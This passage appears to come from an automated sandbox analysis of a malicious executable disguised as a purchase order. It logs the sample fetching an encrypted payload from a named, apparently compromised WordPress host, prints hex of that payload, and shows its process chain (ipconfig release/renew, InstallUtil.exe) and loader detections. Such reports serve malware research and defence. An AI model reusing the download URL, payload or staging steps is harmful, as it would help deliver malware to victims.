                                      Jan 9, 2025 08:28:27.680912018 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.680919886 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.680932999 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.681466103 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.681482077 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.681541920 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.681549072 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.718816042 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.718836069 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.718899012 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.718924046 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.718949080 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.734117031 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.734133959 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.734208107 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.734225988 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.770443916 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.770466089 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.770523071 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.770535946 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.770566940 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.771080971 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.771095991 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.771156073 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.771169901 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.771608114 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.771626949 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.771667957 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.771675110 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.771692038 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.772461891 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.772485018 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.772538900 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.772547960 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.773264885 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.773283005 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.773328066 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.773335934 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.773353100 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.773365974 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.773369074 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.773400068 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.773410082 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.773425102 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.803374052 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.803392887 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.803477049 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.803491116 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.818177938 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.818236113 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.818276882 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.818286896 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.818298101 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.854305983 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.854326010 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.854386091 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.854402065 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.854413986 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.854904890 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.854918957 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.854965925 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.854974031 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.855483055 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.855492115 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.855549097 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.855557919 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.855577946 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.856190920 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.856205940 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.856251955 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.856265068 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.856271029 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.856286049 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.856303930 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.856338024 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.857037067 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.857052088 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.857110023 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.857124090 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.857167959 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.889858007 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.889900923 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.889941931 CET443497095.23.51.54192.168.2.6
                                      Jan 9, 2025 08:28:27.889941931 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.889976978 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.890017033 CET49709443192.168.2.65.23.51.54
                                      Jan 9, 2025 08:28:27.896007061 CET49709443192.168.2.65.23.51.54
                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 9, 2025 08:28:25.382659912 CET5066353192.168.2.61.1.1.1
                                      Jan 9, 2025 08:28:25.564795017 CET53506631.1.1.1192.168.2.6
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jan 9, 2025 08:28:25.382659912 CET192.168.2.61.1.1.10x948eStandard query (0)www.new.eventawardsrussia.comA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jan 9, 2025 08:28:25.564795017 CET1.1.1.1192.168.2.60x948eNo error (0)www.new.eventawardsrussia.com5.23.51.54A (IP address)IN (0x0001)false
                                      • www.new.eventawardsrussia.com
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.6497095.23.51.544435328C:\Users\user\Desktop\Purchase Order A2409002.scr.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-09 07:28:26 UTC227OUTGET /wp-includes/Cgntbjy.vdf HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                      Host: www.new.eventawardsrussia.com
                                      Connection: Keep-Alive
                                      2025-01-09 07:28:26 UTC220INHTTP/1.1 200 OK
                                      Server: nginx/1.26.1
                                      Date: Thu, 09 Jan 2025 07:28:26 GMT
                                      Content-Length: 1375240
                                      Connection: close
                                      Last-Modified: Tue, 07 Jan 2025 14:39:46 GMT
                                      ETag: "14fc08-62b1eb76a93b2"
                                      Accept-Ranges: bytes
                                      2025-01-09 07:28:26 UTC16164INData Raw: 7a 95 76 4d b7 c7 0b a6 92 7d 02 30 67 3d 40 43 eb 44 1b f0 2c 7a 0b 0b 6a 34 ef 87 09 7c 26 fa 2a cd 73 9c c5 1c 2a 7c 07 a3 bd 3e 86 cb ad eb eb a9 a4 ae 4e 00 4e 0d d7 41 18 14 4e 9c 9e 12 97 e6 2d 42 2d b4 e9 16 72 0a fb ab 6f a1 22 6a 3c 63 e5 48 05 31 9b 5f a4 d9 a9 c8 c7 3e 1e 9f 74 24 f6 e0 1e 1e a6 4c 52 c7 c1 9b e4 f5 91 b7 fe 74 c0 52 39 2b d8 6c d6 bf ac f9 a7 a6 e2 d0 5a 7e c8 a4 7b 88 13 db b1 72 78 30 98 c7 2a 72 a2 33 c5 b7 5c f1 91 de 33 9c 20 7e 7a 7b 9d c5 bc 23 37 27 97 09 3d 19 db 43 c8 af d9 6d dd d4 60 e8 98 b6 16 17 1e 72 29 1f 58 24 62 e6 2c 04 5e 11 48 c6 b0 e5 5b c5 c6 17 9f af 47 96 c8 f0 69 f1 3c 40 9d 6b 84 72 f6 03 d7 07 b8 79 32 b7 ba e7 f9 84 51 65 ee a1 37 82 72 5f 53 e3 e0 c3 27 12 c8 47 04 4b e7 2f 2c 6b b4 03 7e a9 70
                                      Data Ascii: zvM}0g=@CD,zj4|&*s*|>NNAN-B-ro"j<cH1_>t$LRtR9+lZ~{rx0*r3\3 ~z{#7'=Cm`r)X$b,^H[Gi<@kry2Qe7r_S'GK/,k~p
                                      2025-01-09 07:28:26 UTC16384INData Raw: f3 e5 79 bf 18 6f d7 ba 95 46 1e 2a 2e 06 83 5d a4 b1 07 8a ba ab 06 6a db 07 44 2a 12 f9 b8 43 97 7f 05 49 2b af 10 06 cc cb e2 54 15 e2 9f c8 54 9f 4a b2 b1 74 9b 43 eb f1 71 44 d1 6f 78 5d e6 4f 02 e5 4a 68 71 50 bc 2c 1d 69 6c 27 33 32 49 ff b6 28 33 a9 b2 ec 82 9c 14 19 09 67 3c f6 9b 1e a3 91 ef 2d d0 e2 da d9 26 8b c8 67 0d e1 90 40 11 f4 61 de 8c 3d f0 32 f7 fe e6 90 06 8d 4d 61 e7 f5 98 e3 5f d5 1c 4d c5 dc 20 05 65 38 20 0b 46 1a f8 7a d4 a5 c7 52 11 54 4a d6 8a 92 f0 1c 49 c5 73 72 23 0a 15 70 72 41 a2 20 a6 4c 2e 2c 3f 79 17 a0 56 af fe 35 61 0b 1d df e5 70 36 1e 65 21 66 4e fe 36 b0 fa e2 ab de 4d 05 33 ac 90 0e f1 f8 db 4e 91 e5 cb ec 02 eb e7 93 02 1e 2d e2 b2 40 06 01 30 e2 5a 96 bb a2 40 f1 76 86 6e 45 cc cf fd 0b 94 c8 11 b7 be a6 8c 5e
                                      Data Ascii: yoF*.]jD*CI+TTJtCqDox]OJhqP,il'32I(3g<-&g@a=2Ma_M e8 FzRTJIsr#prA L.,?yV5ap6e!fN6M3N-@0Z@vnE^
                                      2025-01-09 07:28:26 UTC16384INData Raw: 67 61 24 93 ac 63 13 08 87 ce 73 1d 3b b1 2c 83 0c 73 bd 33 d3 30 81 32 bd e3 97 00 3e 39 57 39 76 f4 fb e5 cf 2b b2 b7 a5 e7 0c c2 d1 df 00 e4 99 02 0e 57 8f 08 dd a6 fb cc 29 76 f5 57 08 d8 4e 0b 72 d3 2c bb c8 ec 73 22 6f 0b 9b 87 d8 08 6c e0 4c 6f 61 9f 02 cf e7 d7 23 cf 6c bf 29 a0 52 05 4e 18 cd fe c5 51 a9 fb c3 5f 55 b6 b3 47 98 51 49 21 9e f8 5f b5 04 cc d8 fa 6b 18 f6 55 95 a0 c8 90 81 64 53 78 a0 68 81 06 48 29 26 a0 03 bf b5 e5 1a b6 c6 f4 17 49 b2 c9 f8 ad f8 81 73 6a d8 44 86 ae f4 4a 64 f8 a9 73 4e 88 37 62 ee 49 a0 1a 1f 93 7b 0e ec 53 9a 72 52 a1 62 35 41 94 e2 61 ff d9 46 b3 9b ae 51 de c6 97 cc b1 3a e9 cb cb 77 26 b9 75 71 41 1d 20 dc a9 c8 fb f1 df b0 58 4b ee 3a 28 b9 06 95 02 f1 f1 f3 89 90 49 30 00 d9 b8 5f c4 94 18 48 af a6 3d 95
                                      Data Ascii: ga$cs;,s302>9W9v+W)vWNr,s"olLoa#l)RNQ_UGQI!_kUdSxhH)&IsjDJdsN7bI{SrRb5AaFQ:w&uqA XK:(I0_H=
                                      2025-01-09 07:28:26 UTC16384INData Raw: 15 19 d1 74 06 84 95 e5 5f 8a f4 13 60 ff 38 eb ad 7c ba a2 3d f0 2b d7 90 41 1c 4c b8 de 75 b6 87 b0 88 e0 e5 e1 d7 c3 9e ec ff a0 a3 95 90 0c 12 4f 6f 00 49 95 85 cf 0f e4 53 30 84 0a 82 83 fe 13 37 15 a2 56 fb d3 04 49 14 9a bc 2c cd 5f 96 0f 9b 79 37 b1 2a 8c 29 c5 94 ef 22 1e 3e 2e 31 e9 f6 6f 2b 81 a6 5e 4d 6a d7 47 54 c6 22 05 39 cf ba 41 14 71 a2 2a ab 8a 5e 7b 7c c6 db 55 fb d5 73 4f 48 17 d5 a9 09 2b 1e c8 86 b4 af 27 1a 22 7c d7 0d f7 e6 b2 79 18 18 be 27 a7 c1 70 64 90 87 ea 67 4b 7c 55 f6 7e 7d 47 54 10 60 43 01 a3 87 cd d1 70 71 90 c3 3d 84 c6 a4 41 72 b3 ee 2a 99 6e b5 03 4a cd f0 55 d1 9f 5a d5 fb c7 d0 4c f5 50 7a 36 87 fb 45 fb 98 fc 71 ad c3 9b dc 3d 5c 4a ea 2b d4 ec c9 72 8f f8 5c 50 11 8b da 18 58 18 a9 4d 94 1b ab de 13 39 ef ca c0
                                      Data Ascii: t_`8|=+ALuOoIS07VI,_y7*)">.1o+^MjGT"9Aq*^{|UsOH+'"|y'pdgK|U~}GT`Cpq=Ar*nJUZLPz6Eq=\J+r\PXM9
                                      2025-01-09 07:28:26 UTC16384INData Raw: 96 b7 a9 55 28 67 61 fc b2 f8 07 f3 07 c2 9f 00 1d b6 73 05 a4 64 0e 7e ba 66 22 1a be 50 1a 14 27 45 3f da b4 a3 68 35 50 a8 ff 28 d7 fc c6 4e e8 e9 10 97 6c 23 ca 7c c6 fd 78 6e a9 a7 37 01 01 a0 fe d6 83 14 e0 89 89 16 84 1a 6a 62 87 02 eb b7 d1 8c b7 b2 bb b8 9c 6e c7 4f 97 c1 3a de 18 32 17 e4 1f 2e f4 7c 36 cd 1b ec b3 29 8b 73 6d f6 12 04 34 20 83 73 05 5d 6b 9d 9e b5 ac 02 6e af d1 c8 0c 43 eb d7 07 cf 6a d1 79 6a 55 ae 9a 41 ac 5a 4b 3f 7d 55 8e 65 ea 40 9f 46 44 66 f8 f8 6e 36 0b 3d 4d 11 e8 2f 2c 28 82 28 65 6f d6 8d 81 3d 4c c7 08 58 3e bf 0c a2 dc df 16 bc 68 47 c2 77 02 37 da 9a 54 a9 89 f8 95 4f dc 64 b9 79 34 76 24 ec d0 6b 12 74 57 c5 6c fc 14 02 09 5d 38 6c 37 88 3f 1b 4b de 4d 85 f7 cc cd e2 82 23 87 4a 1f dc 76 77 8b 17 63 d9 6b ba c6
                                      Data Ascii: U(gasd~f"P'E?h5P(Nl#|xn7jbnO:2.|6)sm4 s]knCjyjUAZK?}Ue@FDfn6=M/,((eo=LX>hGw7TOdy4v$ktWl]8l7?KM#Jvwck
                                      2025-01-09 07:28:26 UTC16384INData Raw: 07 88 bd 53 14 a0 5c cc 24 70 c6 c0 f9 ba 25 eb eb 7d 62 02 cb dd 58 eb 6f 88 95 4b 67 bb d2 82 df 3e d3 65 8b f5 ba c8 8e 5c c0 cf ac 30 b5 68 01 f8 54 99 6c 5d 89 62 d0 55 32 f7 95 f6 f7 db c5 72 6a 34 ef 22 4c d6 e1 a4 96 89 43 9e 6d 8d f4 e5 d9 4a f0 9f ac b8 9c 22 be 26 eb f0 76 d4 67 d6 04 dc d1 d7 aa 5e ce 1f 2e 1c 50 1e af 59 f1 51 29 ba 1c da 77 f3 41 61 59 42 c5 d6 25 60 dd a7 f3 a2 c5 54 a8 03 1e e8 68 0a b8 b8 d5 69 d9 1c 3c d2 ec 12 5d f3 cd 81 8a ca fb 58 bb 02 b3 03 2a dd 9c 0d 15 d6 9f 03 d0 73 71 1c 5e ee e5 5d d5 bd 67 52 1e 11 fd 2f 56 3d 64 9b 06 c4 23 ac cd 00 e5 70 a0 5f ad 6b 5a a0 d5 c3 1e 44 bb ef fb 8c a0 67 7d 26 31 81 c7 ef f6 3b e4 3b 37 06 4c df 29 2c a5 1e 60 13 ef 8a a7 f4 1a 6b 65 a9 13 0f bc 75 8f 50 25 a3 a7 48 8d cb ba
                                      Data Ascii: S\$p%}bXoKg>e\0hTl]bU2rj4"LCmJ"&vg^.PYQ)wAaYB%`Thi<]X*sq^]gR/V=d#p_kZDg}&1;;7L),`keuP%H
                                      2025-01-09 07:28:27 UTC16384INData Raw: e2 3a c3 ae f2 a8 d1 f2 df b8 09 b9 06 44 7a f0 fa 1f 5b 0b c6 10 84 e7 0d a6 ba 7f 85 e0 90 db 09 b2 c3 80 8c c6 22 5f 82 1c f1 80 34 e9 f6 df 45 45 b3 d1 58 ce 5e 42 b8 47 3e 5f d6 17 c2 ca e0 6d b9 b8 68 d9 52 37 5c 6f 0d 19 1f a3 09 40 8a d9 ac 37 34 63 a4 6e 14 9f 7c c4 ef 33 99 56 48 33 41 84 c4 28 78 d3 ee 1a 5b f4 c3 9f 37 ef 7a 4b 40 ab 7b 08 a3 db 41 5c bc dd 6b 59 4f 5d 7d 15 94 12 7a 75 c4 71 72 a4 47 85 69 a2 8b d9 2c d4 e1 34 92 3d c3 9b f8 d7 55 25 eb d9 bc 4a 00 d6 a3 a2 0d 2f d2 10 87 97 9b 72 34 8f 5c 48 7a a8 ac 24 3d ce 46 26 c7 41 4e 7f 79 31 62 61 28 d9 2c fa 18 72 53 9a 3f 18 d6 b7 c6 e6 c9 4b 69 70 e2 59 08 2c bf 1d 50 38 ad 85 8e 17 7d ee 9f 2d 79 72 99 cf 4b f4 73 96 ae 14 00 32 d5 f6 3c 20 64 dc 62 7f b4 4f 84 be 38 ff cf c0 4b
                                      Data Ascii: :Dz["_4EEX^BG>_mhR7\o@74cn|3VH3A(x[7zK@{A\kYO]}zuqrGi,4=U%J/r4\Hz$=F&ANy1ba(,rS?KipY,P8}-yrKs2< dbO8K
                                      2025-01-09 07:28:27 UTC16384INData Raw: 62 0a 04 b7 c0 cb b7 7f 8c a3 05 b3 3e cf 6c 0f 9e d7 b4 f7 6b b2 8b 54 9c 38 32 f6 2d b8 41 1a d8 93 01 98 2c d8 d3 ed f6 d9 47 9d dd e8 29 f8 6a c7 32 27 f4 47 8c d5 7b 96 93 70 94 ed 35 1b d2 d9 98 ae ee 69 74 ba ae 9c e3 9f 36 b1 a2 8e 39 10 64 22 53 cc 38 6e cb b0 0d c5 3f 94 ac dd 5c fd 2b 68 38 17 2a c5 94 b8 a6 67 a6 51 08 7d 9d 86 cd 34 13 19 b7 de 78 74 a4 a2 34 c7 1d b0 d6 ee c8 71 aa c1 83 57 78 93 5f 33 04 17 51 7c ae 6a 09 2c c8 09 95 81 c2 06 ed 42 4a 31 37 c7 6d 1d 27 e9 09 4f 9b 22 02 59 af 8c a8 2b d6 c5 d8 92 41 78 2f df f7 b4 6d fb 12 fa 01 1d a5 50 ac 38 eb be 51 39 c8 a8 42 11 6f 08 0e f5 3e 9c 83 43 d5 a3 93 57 eb 69 f2 cd 84 61 7f bb 23 e4 2e 78 4e c1 78 20 5d cf 7e 04 c4 5f cb 33 bf f8 de 2d 8c a8 55 e7 6b a6 29 c1 7b 8e 34 4f 92
                                      Data Ascii: b>lkT82-A,G)j2'G{p5it69d"S8n?\+h8*gQ}4xt4qWx_3Q|j,BJ17m'O"Y+Ax/mP8Q9Bo>CWia#.xNx ]~_3-Uk){4O
                                      2025-01-09 07:28:27 UTC16384INData Raw: 2e 90 ad 4a a8 33 81 17 ba 0f fe ad e7 ba 7c 33 b4 6d 21 6b fe 92 44 d9 26 24 81 7d 45 fd 49 d2 e5 1b a0 2e 3b fc c7 13 98 41 69 f0 62 92 68 a1 f9 54 fc 42 aa 90 a2 2f 65 bc 31 46 66 e8 96 0e e6 11 78 5d 42 08 26 e2 0a 45 80 1b cc 0c c3 1e 4f e8 28 ef 5d 1a 24 5b 29 ca 6b 95 d2 57 dd 79 ad 4e 6a ac b7 e0 65 a5 9d 1a 6f b8 6d a2 bc b2 6e 3c 77 cb ba 1c db 38 ef 6e 28 5f 94 e1 a3 47 14 5a 87 dc ad 93 4f 96 9c 79 63 cc bf 08 1a 41 21 18 5d 0d 3f 15 79 ae cc 3d c8 47 cf a0 f8 e6 8f 96 82 3c 35 98 15 3f 5b 19 c9 1e 44 7f 4a d4 ce 0d 9c ec a8 1b 50 bc 0b dc dc e7 8b 2e 33 2b df a8 e8 f1 b0 7c ef a2 45 e0 8a 2f 53 6f 91 de c3 24 e1 4f 0e 16 9f f5 63 0d 6f 22 39 35 43 22 ad 94 17 5b 35 1c 9e 82 d9 0c 0a 4e 3a aa c4 10 24 29 40 61 eb 56 dd 67 53 b9 bc 73 14 59 58
                                      Data Ascii: .J3|3m!kD&$}EI.;AibhTB/e1Ffx]B&EO(]$[)kWyNjeomn<w8n(_GZOycA!]?y=G<5?[DJP.3+|E/So$Oco"95C"[5N:$)@aVgSsYX
                                      2025-01-09 07:28:27 UTC16384INData Raw: 99 c6 0c 59 1f 8d 2b cf c4 18 4e 09 0d 00 fd 5a 23 e0 60 a8 e3 7f 8d 7e 9a b3 c9 23 e3 ee a3 ed 4d f8 50 44 75 c4 54 b9 5c a3 c1 c9 d3 41 03 b0 d9 3b ee 38 e7 64 08 48 6e d9 ba 95 4a a2 c5 c4 62 97 34 78 a5 45 5b 07 f8 d6 28 fa 74 84 b1 b6 6f 3f a6 7b f1 8d 04 53 8c 26 26 c4 03 91 f2 c3 88 10 3b 5f 71 7c 6f af 14 e7 ab 49 15 9d b3 c6 5c 42 3d c5 64 d0 2f b5 41 0f 41 32 fd 15 d9 5a e8 fd d5 88 d6 af d2 45 4a 25 77 e9 a1 e8 86 84 88 6f 8e 66 2e 19 f0 51 f0 35 0c c8 5a 96 2a 18 84 8a 9d 36 56 9f c3 e7 cf d4 67 0b 5a c4 c9 6c c9 e4 11 91 87 3b 00 10 00 ff da 09 74 b7 91 b1 72 97 6a 82 c7 15 fa 93 cb 58 75 94 d3 17 87 03 a5 4e 2b 14 72 5b a3 53 e1 cc 92 71 1a 32 14 f4 15 25 4c d3 27 b2 e5 d3 a8 b7 9c 81 7c d9 64 ff 28 17 f8 58 bf 67 49 13 eb 3a 0f e3 54 0d 9d
                                      Data Ascii: Y+NZ#`~#MPDuT\A;8dHnJb4xE[(to?{S&&;_q|oI\B=d/AA2ZEJ%wof.Q5Z*6VgZl;trjXuN+r[Sq2%L'|d(XgI:T


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:02:28:24
                                      Start date:09/01/2025
                                      Path:C:\Users\user\Desktop\Purchase Order A2409002.scr.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\Purchase Order A2409002.scr.exe"
                                      Imagebase:0xe40000
                                      File size:13'312 bytes
                                      MD5 hash:C6F7275A080D01719B1772FA6E33D4C8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2345240998.0000000006EA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2324411539.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2332483290.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:02:28:28
                                      Start date:09/01/2025
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                      Imagebase:0x1c0000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:02:28:28
                                      Start date:09/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff66e660000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:02:28:28
                                      Start date:09/01/2025
                                      Path:C:\Windows\SysWOW64\ipconfig.exe
                                      Wow64 process (32bit):true
                                      Commandline:ipconfig /release
                                      Imagebase:0x890000
                                      File size:29'184 bytes
                                      MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:5
                                      Start time:02:28:40
                                      Start date:09/01/2025
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                      Imagebase:0xf0000
                                      File size:42'064 bytes
                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:6
                                      Start time:02:28:41
                                      Start date:09/01/2025
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                      Imagebase:0x1c0000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:02:28:41
                                      Start date:09/01/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff66e660000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:02:28:41
                                      Start date:09/01/2025
                                      Path:C:\Windows\SysWOW64\ipconfig.exe
                                      Wow64 process (32bit):true
                                      Commandline:ipconfig /renew
                                      Imagebase:0x890000
                                      File size:29'184 bytes
                                      MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:11
                                      Start time:02:28:42
                                      Start date:09/01/2025
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 1144
                                      Imagebase:0xf10000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:11.4%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:2.8%
                                        Total number of Nodes:390
                                        Total number of Limit Nodes:51
